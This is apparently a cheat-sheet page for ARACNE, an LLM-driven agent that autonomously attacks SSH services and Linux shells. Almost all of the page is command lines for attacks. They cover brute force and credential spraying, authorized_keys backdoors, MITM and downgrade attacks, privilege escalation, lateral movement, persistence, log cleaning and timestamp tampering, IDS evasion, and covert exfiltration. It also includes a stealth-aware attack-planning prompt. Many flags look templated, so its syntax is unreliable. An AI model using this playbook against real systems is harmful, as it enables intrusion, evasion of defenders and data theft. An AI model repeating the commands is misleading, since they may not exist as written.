ARACNE Cheat Sheet

📋 Copy All Commands 📄 Generate PDF

Overview

ARACNE (Autonomous Reconnaissance and Attack Coordination for Network Exploitation) is an LLM-based agent specifically designed for targeting SSH services and autonomously exploring and exploiting Linux shell environments. It combines large language model reasoning with traditional penetration testing techniques to perform sophisticated attacks on SSH-accessible systems.

⚠️ Critical Warning: Advanced autonomous exploitation tool. Use only on systems you own or have explicit written authorization to test. Unauthorized use is illegal.

Installation

Prerequisites

# System requirements
python3 --version  # Python 3.9+
pip3 --version
git --version

# Required system packages
sudo apt update
sudo apt install -y python3-pip python3-venv git curl wget
sudo apt install -y openssh-client sshpass hydra nmap masscan

# Install additional security tools
sudo apt install -y john hashcat gobuster dirb nikto
sudo apt install -y metasploit-framework exploitdb

Installation Methods

# Method 1: Git clone and setup
git clone https://github.com/aracne-ai/aracne.git
cd aracne
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt

# Install LLM dependencies
pip install openai anthropic langchain
pip install transformers torch
pip install paramiko fabric pexpect

# Method 2: Docker installation
docker pull aracne/aracne:latest
docker run -it --rm -v $(pwd)/sessions:/app/sessions aracne/aracne:latest

# Method 3: PyPI installation (if available)
pip install aracne-agent

Configuration Setup

# Create configuration directory
mkdir -p ~/.aracne/config
mkdir -p ~/.aracne/sessions
mkdir -p ~/.aracne/payloads
mkdir -p ~/.aracne/logs

# Initialize configuration
aracne init

# Configure LLM providers
aracne config set openai_api_key "your-openai-key"
aracne config set openai_model "gpt-4"
aracne config set anthropic_api_key "your-anthropic-key"

# Set operational parameters
aracne config set max_session_time 3600
aracne config set autonomous_mode true
aracne config set stealth_mode true
aracne config set evidence_collection true

Core Commands

Basic Operations

# Display help and version
aracne --help
aracne --version
aracne modules list

# Quick SSH reconnaissance
aracne recon ssh --target 192.168.1.100
aracne recon ssh --network 192.168.1.0/24
aracne recon ssh --target-list targets.txt

# SSH service analysis
aracne analyze ssh --target 192.168.1.100 --deep
aracne analyze ssh --target 192.168.1.100 --version-detection
aracne analyze ssh --target 192.168.1.100 --configuration-analysis

# System status and health
aracne status
aracne health-check
aracne modules status

Target Management

# Add SSH targets
aracne target add --host 192.168.1.100 --port 22
aracne target add --host example.com --port 2222
aracne target add --network 192.168.1.0/24 --ssh-only

# Target information and management
aracne target list --active
aracne target info 192.168.1.100
aracne target remove 192.168.1.100

# Import targets from various sources
aracne target import --nmap ssh_scan.xml
aracne target import --masscan masscan_results.txt
aracne target import --file ssh_targets.txt

# Target prioritization
aracne target prioritize --by vulnerability
aracne target prioritize --by accessibility
aracne target prioritize --custom-scoring

Session Management

# Create and manage attack sessions
aracne session create --target 192.168.1.100 --name "target_compromise"
aracne session list --active
aracne session switch target_compromise

# Session configuration
aracne session config --max-duration 2h
aracne session config --stealth-level high
aracne session config --logging-level verbose

# Session control
aracne session start --target 192.168.1.100
aracne session pause target_compromise
aracne session resume target_compromise
aracne session terminate target_compromise

SSH Reconnaissance and Analysis

SSH Service Discovery

# Comprehensive SSH discovery
aracne discover ssh --network 192.168.1.0/24 --comprehensive
aracne discover ssh --target-list targets.txt --fast
aracne discover ssh --target 192.168.1.100 --deep-analysis

# SSH version and banner analysis
aracne analyze banner --target 192.168.1.100
aracne analyze version --target 192.168.1.100 --vulnerability-check
aracne analyze configuration --target 192.168.1.100 --security-assessment

# SSH algorithm and cipher analysis
aracne analyze algorithms --target 192.168.1.100
aracne analyze ciphers --target 192.168.1.100 --weak-crypto
aracne analyze kex --target 192.168.1.100 --security-analysis

SSH Vulnerability Assessment

# SSH-specific vulnerability scanning
aracne vuln scan-ssh --target 192.168.1.100 --comprehensive
aracne vuln scan-ssh --target 192.168.1.100 --known-exploits
aracne vuln scan-ssh --network 192.168.1.0/24 --quick

# Configuration vulnerability analysis
aracne vuln config --target 192.168.1.100 --misconfigurations
aracne vuln config --target 192.168.1.100 --weak-settings
aracne vuln config --target 192.168.1.100 --default-configs

# SSH implementation vulnerabilities
aracne vuln implementation --target 192.168.1.100 --version-specific
aracne vuln implementation --target 192.168.1.100 --buffer-overflows
aracne vuln implementation --target 192.168.1.100 --timing-attacks

User Enumeration

# SSH user enumeration techniques
aracne enum users --target 192.168.1.100 --timing-based
aracne enum users --target 192.168.1.100 --error-based
aracne enum users --target 192.168.1.100 --comprehensive

# Username wordlist generation
aracne generate usernames --target 192.168.1.100 --context-aware
aracne generate usernames --company "Example Corp" --employees
aracne generate usernames --domain example.com --email-based

# User validation and verification
aracne validate users --target 192.168.1.100 --user-list users.txt
aracne validate users --target 192.168.1.100 --probabilistic
aracne validate users --target 192.168.1.100 --stealth-mode

Autonomous SSH Exploitation

Credential-Based Attacks

# Intelligent brute force attacks
aracne attack brute-force --target 192.168.1.100 --smart
aracne attack brute-force --target 192.168.1.100 --user admin --adaptive
aracne attack brute-force --target 192.168.1.100 --credential-stuffing

# Dictionary attacks with AI optimization
aracne attack dictionary --target 192.168.1.100 --ai-optimized
aracne attack dictionary --target 192.168.1.100 --context-aware
aracne attack dictionary --target 192.168.1.100 --pattern-learning

# Credential spraying
aracne attack spray --network 192.168.1.0/24 --common-passwords
aracne attack spray --target-list targets.txt --seasonal-passwords
aracne attack spray --targets multiple --lockout-aware

Key-Based Attacks

# SSH key discovery and analysis
aracne keys discover --target 192.168.1.100 --web-crawling
aracne keys discover --target 192.168.1.100 --git-repositories
aracne keys discover --target 192.168.1.100 --configuration-files

# Private key attacks
aracne keys attack --target 192.168.1.100 --weak-keys
aracne keys attack --target 192.168.1.100 --default-keys
aracne keys attack --target 192.168.1.100 --cracking

# Key injection and manipulation
aracne keys inject --target 192.168.1.100 --authorized-keys
aracne keys manipulate --target 192.168.1.100 --key-replacement
aracne keys backdoor --target 192.168.1.100 --persistent-access

Protocol-Level Exploits

# SSH protocol exploitation
aracne exploit protocol --target 192.168.1.100 --version-specific
aracne exploit protocol --target 192.168.1.100 --implementation-bugs
aracne exploit protocol --target 192.168.1.100 --timing-attacks

# Man-in-the-middle attacks
aracne exploit mitm --target 192.168.1.100 --arp-poisoning
aracne exploit mitm --target 192.168.1.100 --dns-spoofing
aracne exploit mitm --target 192.168.1.100 --certificate-manipulation

# Downgrade attacks
aracne exploit downgrade --target 192.168.1.100 --weak-algorithms
aracne exploit downgrade --target 192.168.1.100 --legacy-protocols
aracne exploit downgrade --target 192.168.1.100 --cipher-downgrade

Linux Shell Exploitation

Initial Access and Shell Establishment

# Establish initial shell access
aracne shell establish --target 192.168.1.100 --method ssh
aracne shell establish --target 192.168.1.100 --credentials user:pass
aracne shell establish --target 192.168.1.100 --key-file private_key

# Shell upgrade and stabilization
aracne shell upgrade --session session-123 --interactive
aracne shell upgrade --session session-123 --pty
aracne shell upgrade --session session-123 --full-terminal

# Shell persistence mechanisms
aracne shell persist --session session-123 --cron-job
aracne shell persist --session session-123 --systemd-service
aracne shell persist --session session-123 --ssh-keys

System Reconnaissance

# Autonomous system enumeration
aracne recon system --session session-123 --comprehensive
aracne recon system --session session-123 --quick-wins
aracne recon system --session session-123 --stealth-mode

# User and privilege enumeration
aracne recon users --session session-123 --all-users
aracne recon users --session session-123 --privileged-users
aracne recon users --session session-123 --sudo-capabilities

# Network and service discovery
aracne recon network --session session-123 --internal-networks
aracne recon services --session session-123 --running-services
aracne recon processes --session session-123 --interesting-processes

Privilege Escalation

# Autonomous privilege escalation
aracne privesc auto --session session-123 --all-techniques
aracne privesc auto --session session-123 --kernel-exploits
aracne privesc auto --session session-123 --suid-binaries

# Specific escalation techniques
aracne privesc sudo --session session-123 --sudo-abuse
aracne privesc cron --session session-123 --cron-jobs
aracne privesc services --session session-123 --service-abuse

# Custom escalation strategies
aracne privesc custom --session session-123 --ai-guided
aracne privesc search --session session-123 --novel-techniques
aracne privesc exploit --session session-123 --zero-day

Lateral Movement

# Network lateral movement
aracne lateral network --session session-123 --ssh-keys
aracne lateral network --session session-123 --credential-reuse
aracne lateral network --session session-123 --trust-relationships

# Service-based lateral movement
aracne lateral services --session session-123 --shared-services
aracne lateral services --session session-123 --database-access
aracne lateral services --session session-123 --file-shares

# Advanced lateral movement
aracne lateral advanced --session session-123 --kerberos
aracne lateral advanced --session session-123 --container-escape
aracne lateral advanced --session session-123 --cloud-metadata

AI-Powered Decision Making

Autonomous Reasoning Engine

# AI reasoning configuration
reasoning_config = {
    "model": "gpt-4",
    "temperature": 0.2,
    "max_tokens": 4000,
    "reasoning_depth": 3,
    "confidence_threshold": 0.85,
    "exploration_factor": 0.3
}

# Custom reasoning prompts for SSH exploitation
ssh_analysis_prompt = """
Analyze the SSH service and system information:
Target: {target}
SSH Version: {ssh_version}
Available Users: {users}
System Information: {system_info}
Previous Attempts: {previous_attempts}

Determine the best exploitation strategy:
1. Most likely attack vectors
2. Probability of success for each
3. Stealth considerations
4. Risk assessment
5. Next steps recommendation
"""

Adaptive Attack Strategies

# AI-guided attack planning
aracne ai plan-attack --target 192.168.1.100 --objective shell-access
aracne ai plan-attack --session session-123 --objective privilege-escalation
aracne ai plan-attack --target 192.168.1.100 --stealth-priority

# Dynamic strategy adaptation
aracne ai adapt-strategy --session session-123 --defense-detected
aracne ai adapt-strategy --session session-123 --failure-analysis
aracne ai adapt-strategy --session session-123 --new-information

# Learning from interactions
aracne ai learn --session session-123 --command-responses
aracne ai learn --target 192.168.1.100 --defense-mechanisms
aracne ai learn --global --pattern-recognition

Intelligent Command Generation

# AI-generated commands for exploration
aracne ai generate-commands --session session-123 --exploration
aracne ai generate-commands --session session-123 --privilege-escalation
aracne ai generate-commands --session session-123 --persistence

# Context-aware command selection
aracne ai select-commands --session session-123 --current-context
aracne ai select-commands --session session-123 --objective-focused
aracne ai select-commands --session session-123 --stealth-optimized

# Command effectiveness analysis
aracne ai analyze-effectiveness --session session-123 --command-history
aracne ai analyze-effectiveness --session session-123 --success-patterns
aracne ai analyze-effectiveness --session session-123 --failure-analysis

Advanced Exploitation Techniques

Stealth and Evasion

# Stealth mode operations
aracne stealth enable --session session-123 --advanced-evasion
aracne stealth timing --session session-123 --random-delays
aracne stealth obfuscation --session session-123 --command-obfuscation

# Anti-forensics techniques
aracne antiforensics enable --session session-123 --log-cleaning
aracne antiforensics timestamps --session session-123 --timestamp-manipulation
aracne antiforensics artifacts --session session-123 --artifact-removal

# Detection evasion
aracne evasion ids --session session-123 --ids-evasion
aracne evasion monitoring --session session-123 --monitoring-detection
aracne evasion behavioral --session session-123 --behavioral-mimicry

Persistence Mechanisms

# Establish persistent access
aracne persist establish --session session-123 --multiple-methods
aracne persist establish --session session-123 --stealth-persistence
aracne persist establish --session session-123 --redundant-access

# Persistence validation and testing
aracne persist validate --session session-123 --all-methods
aracne persist test --session session-123 --reconnection-test
aracne persist monitor --session session-123 --persistence-health

# Persistence cleanup and removal
aracne persist cleanup --session session-123 --selective-removal
aracne persist remove --session session-123 --complete-cleanup
aracne persist verify-removal --session session-123 --forensic-check

Data Exfiltration and Collection

# Intelligent data discovery
aracne data discover --session session-123 --sensitive-files
aracne data discover --session session-123 --database-content
aracne data discover --session session-123 --configuration-files

# Data classification and prioritization
aracne data classify --session session-123 --ai-classification
aracne data prioritize --session session-123 --business-value
aracne data assess --session session-123 --sensitivity-analysis

# Secure data exfiltration
aracne data exfiltrate --session session-123 --encrypted-channel
aracne data exfiltrate --session session-123 --steganography
aracne data exfiltrate --session session-123 --covert-channels

Monitoring and Logging

Session Monitoring

# Real-time session monitoring
aracne monitor session --session session-123 --real-time
aracne monitor activity --session session-123 --command-tracking
aracne monitor progress --session session-123 --objective-tracking

# Performance and resource monitoring
aracne monitor performance --session session-123 --resource-usage
aracne monitor network --session session-123 --traffic-analysis
aracne monitor system --session session-123 --system-impact

# Alert and notification system
aracne monitor alerts --session session-123 --critical-events
aracne monitor notifications --session session-123 --progress-updates
aracne monitor warnings --session session-123 --risk-indicators

Comprehensive Logging

# Enable detailed logging
aracne logging enable --session session-123 --comprehensive
aracne logging enable --session session-123 --ai-decisions
aracne logging enable --session session-123 --command-responses

# Log analysis and insights
aracne logging analyze --session session-123 --pattern-analysis
aracne logging analyze --session session-123 --success-factors
aracne logging analyze --session session-123 --failure-analysis

# Log export and reporting
aracne logging export --session session-123 --format json
aracne logging export --session session-123 --timeline-format
aracne logging export --session session-123 --forensic-format

Security and Ethical Considerations

Authorization and Legal Compliance

# Define authorized targets and scope
aracne scope define --target 192.168.1.100 --authorized
aracne scope define --network 192.168.1.0/24 --internal-testing
aracne scope validate --target 192.168.1.100 --legal-check

# Documentation and evidence
aracne legal document --session session-123 --authorization-proof
aracne legal evidence --session session-123 --chain-of-custody
aracne legal export --session session-123 --court-ready

# Compliance verification
aracne compliance check --session session-123 --ethical-guidelines
aracne compliance verify --session session-123 --legal-requirements
aracne compliance audit --session session-123 --comprehensive

Safety and Risk Management

# Risk assessment and management
aracne risk assess --session session-123 --comprehensive
aracne risk monitor --session session-123 --real-time
aracne risk mitigate --session session-123 --automatic

# Safety controls and limits
aracne safety enable --session session-123 --all-controls
aracne safety limits --session session-123 --time-limits
aracne safety boundaries --session session-123 --scope-enforcement

# Emergency procedures
aracne emergency stop --session session-123 --immediate
aracne emergency cleanup --session session-123 --evidence-removal
aracne emergency report --session session-123 --incident-documentation

Troubleshooting and Optimization

Performance Optimization

# Optimize AI model performance
aracne optimize ai --model-selection --performance-focused
aracne optimize ai --token-usage --cost-optimization
aracne optimize ai --response-time --latency-reduction

# Session performance optimization
aracne optimize session --session session-123 --speed-optimization
aracne optimize session --session session-123 --resource-optimization
aracne optimize session --session session-123 --stealth-optimization

# Network and connectivity optimization
aracne optimize network --session session-123 --connection-stability
aracne optimize network --session session-123 --bandwidth-optimization
aracne optimize network --session session-123 --latency-reduction

Debugging and Diagnostics

# Debug mode and verbose logging
aracne --debug session start --target 192.168.1.100
aracne --verbose ai plan-attack --target 192.168.1.100
aracne logs view --level debug --component ai-reasoning

# System diagnostics
aracne diagnose system --comprehensive
aracne diagnose ai-models --connectivity-test
aracne diagnose ssh-client --configuration-check

# Error analysis and resolution
aracne errors analyze --session session-123 --root-cause
aracne errors resolve --error-id 12345 --auto-fix
aracne errors prevent --session session-123 --predictive-analysis

Recovery and Backup

# Session recovery and restoration
aracne recover session --session-id session-123 --full-recovery
aracne recover state --session session-123 --checkpoint-restore
aracne recover connection --session session-123 --reconnect

# Backup and data protection
aracne backup create --session session-123 --incremental
aracne backup restore --backup-id backup-456 --selective
aracne backup verify --backup-id backup-456 --integrity-check

# Data integrity and validation
aracne verify integrity --session session-123 --all-data
aracne verify consistency --session session-123 --cross-validation
aracne verify authenticity --session session-123 --digital-signatures

Integration Examples

SIEM Integration

# integrations/siem_integration.py
import json
import requests
from aracne.core.integration import BaseIntegration

class SIEMIntegration(BaseIntegration):
    def __init__(self, siem_url, api_key):
        self.siem_url = siem_url
        self.api_key = api_key

    def send_ssh_attempt(self, attempt_data):
        event = {
            "timestamp": attempt_data.timestamp,
            "source": "aracne",
            "event_type": "ssh_attempt",
            "target": attempt_data.target,
            "username": attempt_data.username,
            "success": attempt_data.success,
            "method": attempt_data.method
        }

        self.send_event(event)

    def send_privilege_escalation(self, privesc_data):
        event = {
            "timestamp": privesc_data.timestamp,
            "source": "aracne",
            "event_type": "privilege_escalation",
            "target": privesc_data.target,
            "technique": privesc_data.technique,
            "success": privesc_data.success,
            "privileges_gained": privesc_data.privileges
        }

        self.send_event(event)

    def send_event(self, event):
        headers = {
            "Authorization": f"Bearer {self.api_key}",
            "Content-Type": "application/json"
        }

        response = requests.post(
            f"{self.siem_url}/api/events",
            headers=headers,
            json=event
        )

        return response.status_code == 200

Threat Intelligence Integration

# integrations/threat_intel.py
import requests
from aracne.core.threat_intel import ThreatIntelProvider

class ThreatIntelIntegration(ThreatIntelProvider):
    def __init__(self, api_key):
        self.api_key = api_key
        self.base_url = "https://api.threatintel.com"

    def get_ssh_vulnerabilities(self, ssh_version):
        headers = {"Authorization": f"Bearer {self.api_key}"}

        response = requests.get(
            f"{self.base_url}/vulnerabilities/ssh/{ssh_version}",
            headers=headers
        )

        if response.status_code == 200:
            return response.json()
        return []

    def get_exploit_techniques(self, target_os, target_version):
        headers = {"Authorization": f"Bearer {self.api_key}"}

        response = requests.get(
            f"{self.base_url}/techniques/{target_os}/{target_version}",
            headers=headers
        )

        if response.status_code == 200:
            return response.json()
        return []

    def report_new_technique(self, technique_data):
        headers = {
            "Authorization": f"Bearer {self.api_key}",
            "Content-Type": "application/json"
        }

        response = requests.post(
            f"{self.base_url}/techniques/report",
            headers=headers,
            json=technique_data
        )

        return response.status_code == 201

Best Practices

SSH Exploitation Best Practices

# Reconnaissance before exploitation
aracne recon comprehensive --target 192.168.1.100 --pre-exploitation
aracne analyze target --target 192.168.1.100 --vulnerability-assessment
aracne plan attack --target 192.168.1.100 --risk-assessment

# Gradual escalation approach
aracne attack gentle --target 192.168.1.100 --low-impact
aracne attack moderate --target 192.168.1.100 --measured-approach
aracne attack aggressive --target 192.168.1.100 --high-confidence

# Stealth and operational security
aracne stealth maximum --session session-123 --anti-detection
aracne opsec enable --session session-123 --comprehensive
aracne evasion advanced --session session-123 --adaptive

AI Model Optimization

# Model selection and tuning
aracne ai optimize --model-selection --task-specific
aracne ai tune --parameters --performance-focused
aracne ai calibrate --confidence-thresholds --accuracy-focused

# Prompt engineering and optimization
aracne ai optimize-prompts --task ssh-exploitation
aracne ai optimize-prompts --task privilege-escalation
aracne ai optimize-prompts --task lateral-movement

# Continuous learning and improvement
aracne ai learn --from-sessions --pattern-recognition
aracne ai update --knowledge-base --latest-techniques
aracne ai validate --accuracy --benchmark-testing

Operational Excellence

# Session management best practices
aracne session plan --target 192.168.1.100 --comprehensive-planning
aracne session execute --plan session-plan --monitored-execution
aracne session review --session session-123 --lessons-learned

# Documentation and reporting
aracne document session --session session-123 --comprehensive
aracne report generate --session session-123 --technical-details
aracne evidence collect --session session-123 --forensic-quality

# Quality assurance and validation
aracne validate findings --session session-123 --cross-verification
aracne verify exploits --session session-123 --proof-of-concept
aracne assess impact --session session-123 --business-context

Resources

Documentation

• ARACNE Documentation
• SSH Exploitation Guide
• AI Integration Manual

Research and Papers

• ARACNE Research Papers
• LLM-based Exploitation
• Autonomous Hacking Systems

Community

• ARACNE GitHub
• Security Research Forum
• AI Security Discord

Training

• Advanced SSH Exploitation
• AI-Powered Pentesting
• Linux Post-Exploitation